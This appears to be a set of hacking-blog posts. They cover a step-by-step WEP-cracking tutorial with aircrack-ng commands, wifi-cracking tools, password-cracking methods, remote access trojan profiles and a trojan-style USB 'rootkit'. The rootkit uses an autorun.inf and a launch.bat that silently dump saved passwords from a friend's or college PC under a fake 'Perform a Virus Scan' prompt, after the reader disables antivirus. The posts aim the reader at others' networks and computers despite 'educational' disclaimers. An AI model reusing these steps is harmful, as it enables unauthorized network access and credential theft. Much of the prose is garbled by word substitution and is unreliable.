Tutorial for Cracking Wifi (WEP) Password Using Linux

Tutorial for Cracking Wifi (WEP) Password Using Linux

This tutorial focus on Cracking Wi-Fi Password using Linux OS, in the previous article I wrote about “Arsenal for Wifi Hacking – Tools You Should Have” make sure you read that tutorial first. We will be using some of those tools in Cracking WEP Passwords. Let’s start the process:

Remark: These and all tutorials at Tricksworld are for educational purpose.


1.Download the BackTrack (Linux OS) kind of you’re decision. You can either boot the OS utilizing VMware inside of windows, or you can boot backtrack straight off of a DVD or blaze drive. Guidelines for each of these systems are on the Back track’s official site.

2.When you have booted up backtrack, it will approach you for a username and secret word; for username: root & for password: toor.

3.Now type startx and press enter. This will log you into backtrack and you should now see the desktop.

4.Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.

5.Type in: airmon-ng

6.Look for the name of your wireless card, its different for a lot of computers, mine is bff1, so for the rest of this tutorial that’s what I’m going to use. Replace bff1 in all the following steps with whatever your device name is.

7.Type in command terminal: airmon-ng stop bff1

8.Type in command terminal: macchanger –mac 00:11:22:33:44:55 bff1

9.Type in command terminal: airmon-ng start bff1

10.Type in command terminal: airodump-ng bff1

11.You will now see the greater part of the wifi systems in extent. When you discovered the one you need to hack, press Ctrl + C to quit filtering. Observe the bssid and channel of the system you need to hack.

12.Type in command terminal: airodump-ng -c (put the channel # here) -w wephack –bssid (enter bssid here) bff1

13.Keep that window open, now open another command terminal and enter the following in the newly opened terminal:

14.Type in command terminal: aireplay-ng -1 0 -a (enter bssid here) -h 00:11:22:33:44:55 bff1

15.Type in command terminal: aireplay-ng -3 -b (enter bssid here) -h 00:11:22:33:44:55 bff1

16.Presently backpedal to the first window, you’ll see a number relentlessly expanding. Once it’s over around 10,000 you can endeavor to split the WEP key. On the off chance that this doesn’t work, hold up until the (Number#) is much higher, attempt again at a rate of 15,000 or thereabouts.

17.Open a new command window and type: aircrack-ng -b (enter bssid) wephack-0.cap

You should now see it attempting to crack the WEP key.This could take up to 5 minutes or somewhere in the vicinity relying upon how quick your PC is. When it’s discovered the key, it will show up on the screen. You can now sign into that system utilizing the WEP on the screen.

This tutorial can be used in Ubuntu as well, but you should install Aircracking-ng & Airmong manually because they are not installed as default. Note that these software are already installed in BackTrack


Arsenal For Wifi Hacking – Tools You Should Have

Arsenal For Wifi Hacking – Tools You Should Have


Today at Tricks2Worlds we are going to give a rundown of top Wi-Fi Hacking Tools. Wi-Fi is regularly an uncovered side of the system concerning hacking since signs can be grabbed far and wide & just about by anybody. Switch makers and ISPs turning on WPS as a matter of course make remote assurance and infiltration testing much more essential. With the accompanying main 10 Wi-Fi hacking devices we have the capacity to test our own remote systems for potential security issues.

Note: that these product and instruments are accessible for nothing download over the net. Name of the devices is sufficient for downloading. The greater part of these apparatuses are open source and utilized as a part of Linux working framework.

Let’s start off the Arsenal For Wifi Hacking – Tools You Should Have:


Aircrack is a standout amongst the most well known apparatuses for WEP/WPA/WPA2 breaking. The Aircrack-ng suite contains apparatuses to catch bundles and handshakes, de-validate joined customers and produce activity and instruments to perform beast power and word reference assaults. Aicrack-ng is an in with no reservations one suite containing the accompanying devices (among others):

– Aircrack-ng for wireless password cracking

– Aireplay-ng to generate traffic and client de-authentication

– Airodump-ng for packet capturing

– Airbase-ng to configure fake access points

The Aicrack-ng suite is accessible for Linux and comes standard with Kali Linux you can likewise utilize it in other Linux distros, for example, Ubuntu. In the event that you plan to utilize this apparatus you need to verify your Wifi card is fit for bundle infusion.


The second device you ought to have in your Arsenal For Wi-Fi Hacking is Reaver. Reaver is another well known apparatus for hacking remote systems and targets particularly WPS vulnerabilities. Reaver performs savage power assaults against Wi-Fi Protected Setup (WPS) enlistment center PINs to recoup the WPA/WPA2 passphrase. Since numerous switch makers and ISPs turn on WPS as a matter of course a considerable measure of switches are helpless against this assault out of the container.

So as to utilize Reaver you require a decent flag quality to the remote switch together with the right arrangement. By and large Reaver can recuperate the passphrase from defenseless switches in 4-10 hours, contingent upon the entrance point, signal quality and the PIN itself off kilter. Measurably you have a half risk of breaking the WPS PIN in a large portion of the time.


PixieWPS is a moderately new device included with Kali Linux furthermore focuses on a WPS powerlessness. PixieWPS is composed in C and is utilized to savage drive the WPS PIN logged off misusing the low or non-existing entropy of helpless access focuses. This is known as a pixie dust assault. PixieWPS obliges an adjusted form of Reaver or Wifite to work with. Since this instrument has turned out to be entirely famous in little time, it must number in our Wifi Hacking Arsenal.


Wifite is a computerized device to assault various remote systems encoded with WEP/WPA/WPA2 and WPS. On start-up Wifite obliges a couple of parameters to work with and Wifite will all the diligent work. It will catch WPA handshakes, naturally de-verify associated customers, parody your MAC location and safe the broke passwords.


Wireshark is one of the best system protocal analyzer devices accessible, if not the best. With Wireshark you can investigate a system to the best detail to see what’s going on. Wireshark can be utilized for live parcel catching, profound examination of several conventions, scan and channel bundles and is multiplatform.

Wireshark is incorporated with Kali Linux additionally accessible for Windows and Mac. For specific components you require a Wifi connector which is backings wanton and observing mode.


Number 6th devices that you ought to have in your Arsenal For Wi-Fi Hacking is oclHashcat. oclHashcat is not a committed Wifi hacking device and is excluded with Kali Linux, but rather it can animal power and word reference assaults on caught handshakes quick when utilizing a GPU. Subsequent to utilizing the Aircrack-ng suite, or whatever other device, to catch the WPA handshake you can split it with oclHashcat utilizing your GPU. Utilizing a GPU with oclHashcat, rather than a CPU with Aicrack-ng, will accelerate the breaking process a considerable measure. A normal GPU can attempt around 50.000 blends for every second with oclHashcat.

oclHashcat is accessible for Windows and Linux and has a variant for AMD and Nvidia feature cards. AMD feature cards oblige Catalyst 14.9 precisely and Nvidia feature cards oblige ForceWare 346.x or later to work.

Fern Wifi Cracker:

Greenery Wifi Cracker is a remote security evaluating and assault apparatus written in Python. Greenery Wifi Cracker is the initially devoted Wifi hacking instrument in this rundown which has a graphical client interface. Greenery has the capacity split and recuperate WEP, WPA and WPS keys and contains apparatuses to perfom MiTM assaults.

Plant Wifi Cracker keeps running on any Linux dissemination which contains the essentials. Plant Wifi Cracker is incorporated with Kali Linux.


Wash is an instrument to figure out if an entrance point has WPS empowered or not. You can likewise utilize Wash to check if an entrance point bolted up WPS after various Reaver endeavors. A ton of access focuses locks itself up as a security measure when savage constraining the WPS PIN. Wash is incorporated with the Reaver bundle and comes as a standard apparatus with Kali Linux.


Crunch is an extraordinary and simple to utilize instrument for producing custom wordlists which can be utilized for lexicon assaults. Since the achievement rate of each lexicon assault relies on upon the nature of the utilized wordlist, you can’t abstain from making your own wordlist. Particularly when you need to make wordlists in light of default switch passwords. Crunch can likewise be funneled straightforwardly to different devices like Aircrack-ng. This element can spare a ton of time since you won’t need to hold up until vast secret word records have been created by Crunch before you can utilize them.


To wrap things up instruments you ought to have in your Arsenal For Wi-Fi Hacking is Macchanger. Macchanger is a bit utility which can be utilized to parody your MAC location to an arbitrary MAC location or you can make up your own. Ridiculing your MAC address for Wifi hacking may be important to keep away from MAC channels or to veil your character on a remote system.


These were the main 10 apparatuses utilized for Wifi Hacking, all are accessible for nothing download. These product (devices) are functioning admirably with Linux Distros, for example, Kali & Ubuntu. Test your Wifi Network’s security with these devices. Trust you preferred this article, bear in mind to subscribe to our News Letter and go along with us on social medias.

Top 10 Methods For Cracking Passwords

Top 10 Methods For Cracking Passwords


In sepulcher investigation and PC security, secret word breaking is the procedure of recuperating passwords from information that have been put away in or transmitted by a PC framework. A typical methodology (beast power assault) is to attempt surmises over and over for the secret key and check them against an accessible crypto-realistic hash of the watchword. (Wikipedia)

The reason for secret word breaking may be to help a client recuperate an overlooked watchword (introducing a completely new secret word is to a lesser extent a security hazard, however it includes System Administration benefits), to increase unapproved access to a framework, or as a preventive measure by System Administrators to check for effortlessly split capable passwords. On a document by-record premise, secret word splitting is used to obtain entrance to computerized proof for which a judge has permitted get to yet the specific document’s entrance is limited.

Today at Tricksworld I have prepared a list of Top 10 Methods for Cracking Passwords:

1.Dictionary Attack:-
This uses a basic record containing words that can astonish, be found in a lexicon. At the end of the day, in the event that you will pardon the play on words, this assault utilizes precisely the sort of words that numerous individuals use as their secret key.

2.Brute Force Attack:-
This system is like the lexicon assault however with the special reward, for the programmer, of having the capacity to distinguish non-lexicon words by working through all conceivable alpha-numeric mixes from aaa1 to zzz1.

3.Phishing Attack:-
                This is a simple approach to hack: approach the client for his or her secret key. A phishing email drives the clueless peruser to a faked internet managing an account, installment or other website so as to login and put right some repulsive issue with their security. You may have read the slanting Headline of tech news yesterday “BitPay Sues Insurer After Losing $1.8 Million in Phishing Attack.”

         A key lumberjack or screen scrubber can be introduced by malware which records all that you write or takes screen shots amid a login process, and afterward advances a duplicate of this document to programmer focal.

5.Rainbow Table Attack:-
A rainbow table is a rundown of pre-processed hashes – the numerical estimation of a scrambled secret word, utilized by most frameworks today – and that is the hashes of all conceivable watchword mixes for any given hashing calculation mind. The time it takes to break a secret key utilizing a rainbow table is lessened to the time it takes to find it in the rund.

6.Social Engineering: –
         A most loved of the social architects is to phone an office acting like an IT security tech fellow and just request the system access secret key. You’d be astonished how regularly this functions. It exploits individuals trust.

                Shrewd programmers have understood that numerous corporate passwords are comprised of words that are joined with the business itself. Examining corporate writing, site deals material and even the sites of contenders and recorded clients can give the ammo to manufacture a custom word rundown to use in a savage power assault.

8.Offline Cracking:
                Regularly the objective being referred to has been traded off by means of a hack on an outsider, which then gives access to the framework servers and those terrifically critical client secret key hash documents. The secret key wafer can then take the length of they have to attempt and figure out the code without alarming the objective framework or individual client.

            The secret key wafers closest companion, obviously, is the client’s consistency. Unless a genuinely arbitrary watchword has been made utilizing programming committed to the assignment, a client created “irregular” secret key is unrealistic to be anything of the sort.

10.Shoulder Surfing:-
               The administration work force “uniform” gives a sort of free go to meander around unhindered, and make note of passwords being entered by real individuals from staff. It additionally gives an incredible chance to eyeball every one of those post-it notes adhered to the front of LCD screens with logins jotted upon them.

             These were the 10 strategies for the most part utilized for breaking passwords by programmers, however some different systems are likewise accessible. On the off chance that you think I have missed a top strategy don’t hesitate to express it in remark box with the goal that I can upgrade the rundown and incorporate it.

How to Hack and Control someone’s PC by Remote Access Trojan

Hack and Control someone’s PC by RAT:-

Today I will demonstrate to you best practices to Hack and Control PC by the assistance of RAT. Remote Administration Tool is a malware program that incorporates an indirect access for managerial control over the objective PC. RATs are generally downloaded imperceptibly with a client asked for project -, for example, a diversion – or sent as an email connection. When the host framework is traded off, the gatecrasher may utilize it to disperse RATs to other defenseless PCs and build up a botnet.


To make this sort of assault conceivable programmers tie it or disseminate and get it introduce on the casualty’s computer.After establishment of server record programmer can control casualty’s PC mouse to webcam and numerous all the more thing sitting thousand miles away.

Underneath I will specify about some popular RAT and their components. On the off chance that you need you can download them from their particular webpage.

1. Netbus:~

NetBus is a product program for remotely controlling a Microsoft Windows PC framework over a system. It was made in 1998 and has been extremely questionable for its capability of being utilized as a secondary passage.


There are two parts to the client–server structural planning. The server must be introduced and keep running on the PC that ought to be remotely controlled. It was an .exe record with a document size of just about 500 KB.


1.Keystroke logging

2.Keystroke infusion

3.Screen catches

4.System dispatching

5.Document scanning

6.Closing down the framework

7.Opening/shutting CD-plate

8.Burrowing convention (NetBus associations through various frameworks

2. ProRat:~

ProRat is a Microsoft Windows based indirect access trojan horse, all the more generally known as a RAT (Remote Administration Tool). Likewise with other trojan stallions it utilizes a customer and server.


ProRat opens a port on the PC which permits the customer to perform various operations on the server (the machine being controlled). ProRat is known for its server to be verging on difficult to uproot without cutting-edge antivirus programming.


  • Logging keystrokes
  • Stealing passwords
  • Full control over files
  • Drive formatting
  • Open/close CD tray
  • Hide taskbar, desktop, and start button
  • Writing on-screen
  • Movement of cursor
  • Feed the cat
  • Take screenshots
  • View system information
  • View webcam
  • Download & run files
  • Password Protect your bound server from being used by anyone else

3. Beast:~

Beast is a Windows-based secondary passage trojan horse, all the more regularly referred to in the underground hacking group as a Remote Administration Tool or RAT. It is equipped for tainting renditions of Windows from 95 to 8.1.


It utilized the ordinary client–server model where the customer would be under operation by the assailant and the server is the thing that would contaminate the casualty. Mammoth was one of the first trojans to highlight a converse association with its casualties, and once settled it gave the aggressor complete control over the contaminated PC. It for the most part focused on three disease locale:-

  • C:\Windows\msagent\ms****.com (Size ranging from 30KB to 49KB)
  • C:\Windows\System32\ms****.com (Size ranging from 30KB to 49KB)
  • C:\Windows\dxdgns.dll or C:\Windows\System32\dxdgns.dll (Location dependent on attacker’s choice)

On a machine running Windows XP, evacuation of these three records in experimental mode with framework restore killed would clean the framework.

The default ports utilized for the immediate and opposite associations were 6666 and 9999 separately, however the aggressor had the choice of evolving these. Monster accompanied an implicit firewall bypasser and had the capacity of ending some Anti-Virus or firewall forms. It additionally accompanied a fastener that could be utilized to join two or more records together and after that change their symbol.


  • Direct or Reverse connection option
  • DLL injection location (e.g. explorer.exe)
  • Server name change option
  • Server installation directory (e.g. <windir>)
  • Various IP and Server info notification options (e.g. email, icq, cgi, etc.)
  • Startup keys selection
  • Anti-Virus and firewall killing
  • Other miscellaneous options (e.g. automatic server file deletion, fake error messages, offline keylogger, icon changer, etc.)
  • File Manager – along with browsing victim’s directories it could upload, download, delete, or execute any file
  • Remote Registry Editor
  • Screenshot and Webcam capture utility
  • Services, Applications, and Processes Managers, providing the ability of terminating or executing any of these
  • Clipboard tool that could get currently stored strings
  • Passwords tool capable of recovering any stored passwords in the victim’s computer
  • Power Options (e.g. shutdown, reboot, logoff, crash, etc.)
  • Some tools mainly for creating nuisance (e.g. mouse locking, taskbar hiding, CD-ROM operator and locker, URL opener, wallpaper changer, etc.)
  • Chat client providing communication between the attacker and the victim
  • Other tools such as a Remote IP scanner, live keylogger, offline logs downloader, etc.
  • Server Controls (e.g. server deleter, updater, terminator, info provider, etc.)

4. SubSeven:~

SubSeven, is a remote organization device/trojan project (RAT—where the “T” can have a double significance for this situation). Its name was inferred by spelling NetBus in reverse (“suBteN”) and swapping “ten” with “seven”.

Since its common utilization is to permit undetected and unapproved access, Sub7 is typically portrayed as a trojan horse by security specialist.


Additionally Sub7 has some features deemed of little use in legitimate remote administration like keystroke logging.
Sub7 worked on the Windows 9x and on the Windows NT family of operating systems, up to and including Windows 8.1


  • recording:
    • sound files from a microphone attached to the machine
    • images from an attached video camera
    • screen shots of the computer
  • retrieving a listing of recorded and cached passwords
  • taking over an ICQ account used on the target machine (back then the most popular messaging service); added in version 2.1. This included the ability to disable the local use of the account and read the chat history
  • features which were presumably intended to be used for prank or irritating purposes including:
    • changing desktop colors
    • opening and closing the optical drive
    • swapping the mouse buttons
    • turning the monitor off/on
    • “text2speech” voice synthesizer which allowed the remote controller to have the computer “talk” to its user
  • penetration testing features, including a port scanner and a port redirector.


  •  Remember one thing “To run a VIRUS you need a HUMAN BEING“.
  • “This tutorial is only for Educational Purposes,do not use it to Hack someone PC”.

How to Hack Passwords using USB Drive

Hack Passwords Using USB Drive:-



Today I will show you how to hack Passwords using an USB Pen Drive.

As we all know, Windows stores a large portion of the passwords which are utilized on an every day premise, including moment emissary passwords, for example, MSN, Yahoo, AOL, Windows emissary and so on.

Alongside these, Windows additionally stores passwords of Outlook Express, SMTP, POP,FTP records and auto-complete passwords of numerous programs like IE and Firefox.There exists numerous instruments for recouping these passswords from their put away places.Utilizing these instruments and a USB pendrive you can make your own rootkit to hackpasswords from your friend’s/school Computer.

We require the accompanying devices to make our rootkit:


Recoups the passwords of most well known Instant Messenger projects:MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOLMoment Messenger gave Netscape 7, Trillian, Miranda, and GAIM

Mail PassView:

Recoups the accompanying’s passwords email programs: OutlookExpress, Microsoft Outlook 2000 (POP3 and SMTP Accounts just), Microsoft Outlook2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, NetscapeMail, Mozilla Thunderbird, Group Mail Free.Mail PassView can likewise recoup the passwords of Web-based email accounts(HotMail,Yippee!, Gmail), on the off chance that you utilize the related projects of these records.

IE Passview:

IE PassView is a little utility that uncovers the passwords put away by Web Explorer program. It underpins the new Internet Explorer 7.0, and additionally more established adaptations of Internet pilgrim, v4.0 – v6.0

Protected Storage PassView:

Recuperates all passwords put away inside the Protected Capacity, including the AutoComplete passwords of Internet Explorer, passwords of Secret word ensured locales, MSN Explorer Passwords, and the sky is the limit from there.


PasswordFox is a little watchword recuperation instrument that permits you to see the client names and passwords put away by Mozilla Firefox Web program. Of course,PasswordFox shows the passwords put away in your present profile, however you can without much of a stretch select to watch the passwords of whatever other Firefox profile. For every secret key section,the accompanying data is shown: Record Index, Web Site, User Name,Secret key, User Name Field, Password Field, and the Signons filename.

Here is an orderly procedre to make the secret key hacking toolbox:

NOTE: You should incidentally debilitate your antivirus before taking after these strides.

Step 1:- Download all the 5 tools, extract them and copy only the executables(.exe files)
into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into your USB Drive. 
Step 2:- Create a new Notepad and write the following text into it:
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
Step 3:- Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this
pendrive on your friend’s PC or on your college computer. Just follow these steps
Step 1:- Insert the pendrive and the autorun window will pop-up. (This is because, we have
created an autorun pendrive). 
Step 2:- In the pop-up window, select the first option (Perform a Virus Scan).
Step 3:- Now all the password hacking tools will silently get executed in the background
(This process takes hardly a few seconds). The passwords get stored in the .TXT
Step 4:- Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista 7,8 and 8.1.
NOTE: This procedure will only recover the stored passwords (if any) on the

7 Types of Hacker Motivations

There are good and bad hackers. Here is a window into what they do and why:

White Hat Hackers:

These are the great fellows, PC security specialists who have practical experience in entrance testing and different philosophies to guarantee that an organization’s data frameworks are secure. These IT security experts depend on an always developing arms stockpile of innovation to fight programmers..

Black Hat Hackers:

These are the awful gentlemen, who are regularly alluded to as out and out programmers. The term is regularly utilized particularly for programmers who break into systems or PCs, or make PC infections. Dark cap programmers proceed to mechanically outpace white caps. They frequently figure out how to discover the easiest course of action, whether because of human mistake or lethargy, or with another kind of assault. Hacking idealists regularly utilize the expression “saltines” to allude to dark cap programmers. Dark caps’ inspiration is by and large to get paid.

Script Kiddies:

This is a disdainful term for dark cap programmers who utilization acquired projects to assault arranges and destroy sites trying to make names for themselves.


Some programmer activists are roused by governmental issues or religion, while others may wish to uncover wrongdoing, or definite reprisal, or basically irritate their objective for their own particular stimulation.

State Sponsored Hackers:

Governments around the world understand that it serves their military goals to be very much situated on the web. The platitude used to be, “He who controls the oceans controls the world,” and after that it was, “He who controls the air controls the world.” Now it’s about controlling the internet. State supported programmers have boundless time and financing to target regular people, companies, and governments.

Spy Hackers:

Companies employ programmers to invade the opposition and take competitive advantages. They may hack in from the outside or pick up livelihood so as to go about as a mole. Spy programmers may utilize comparable strategies as hacktivists, yet their just motivation is to serve their customer’s objectives and get paid.

Cyber Terrorists:

These programmers, by and large inspired by religious or political convictions, endeavor to make apprehension and disarray by disturbing discriminating bases. Digital terrorists are by a wide margin the most unsafe, with an extensive variety of aptitudes and objectives. Digital Terrorists extreme inspiration is to spread trepidation, fear and submit murder.

I Hope you all like it..!!

What’s Backdoor and How it Affects PC?

What’s Backdoor and How it Affects PC?


What’s a Computer Backdoor?

A backdoor program is a remote administration utility that allows a user access and control a computer, usually remotely over a network or the Internet. A backdoor is usually able to gain control of a system because it exploits undocumented processes in the system’s code.

These utilities may be legitimate, and may be used for legitimate reasons by authorized administrators, but they are also frequently used by attackers to gain control of a user’s machine without their knowledge or authorization.

A typical backdoor consists of 2 components – the client and its server(s).

An attacker will use a client application to communicate with the server components, which are installed on the victim’s system. The server components can be delivered to the victim’s system in numerous ways – as part of a worm or Trojan payload, as an e-mail attachment, as a tantalizingly-named file on peer-to-peer networks, etc…

Once installed, the server component will open a network port and communicate with the client, to indicate that the computer is infected and vulnerable. An attacker can then use the backdoor’s client to issue commands to the infected system.

Depending on how sophisticated a client is, it can include such features as:

¤ Sending and receiving files.

¤ Browsing through the hard drives and network drives.

¤ Getting system information.

¤ Taking screenshots.

¤ Changing the date/time and settings.

¤ Playing tricks like opening and closing the CD-ROM tray and so on.

Hope you get know about Back-doors now!